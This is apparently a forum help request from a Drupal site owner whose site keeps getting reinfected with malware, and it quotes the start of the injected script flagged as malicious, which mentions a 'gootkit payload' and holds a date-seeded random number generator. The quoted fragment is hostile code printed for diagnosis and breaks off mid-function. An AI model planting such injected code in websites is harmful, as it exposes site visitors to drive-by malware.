A few days ago I saw an email come through from Google that one of my sites was blacklisted because of a malware infection.
Checking, I found this was indeed correct and I did my best to remove the infected file and upgraded my Drupal core install from 6.16 to the latest version 6.26 and upgraded my theme and optional modules.
A subsequent scan with http://sitecheck.sucuri.net and http://urlquery.net/ showed it clear.
But 2 days later and it's infected again!
Have I done something wrong? The sucuri.net report shows the ISP is using Plesk 8. I briefly read that Plesk 8 is not secure and vulnerable.
Here is a copy of what was marked as a "malicious script":
//Congratulations! you have successfully extracted the gootkit payload
//this means i must work hardly :(
function nextRandomNumber() {
    var hi = this.seed / this.Q;
    var lo = this.seed % this.Q;
    var test = this.A * lo - this.R * hi;
    if (test > 0) {
        this.seed = test;
    } else {
        this.seed = test + this.M;
    }
    return (this.seed * this.oneOverM);
}
function RandomNumberGenerator(unix) {
    var d = new Date(unix * 1000);
    var s = Math.ceil(d.getHours() / 6);
    this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
    this.A = 48271;
    this.M = 2147483647;
    this.Q = this.M / this.A;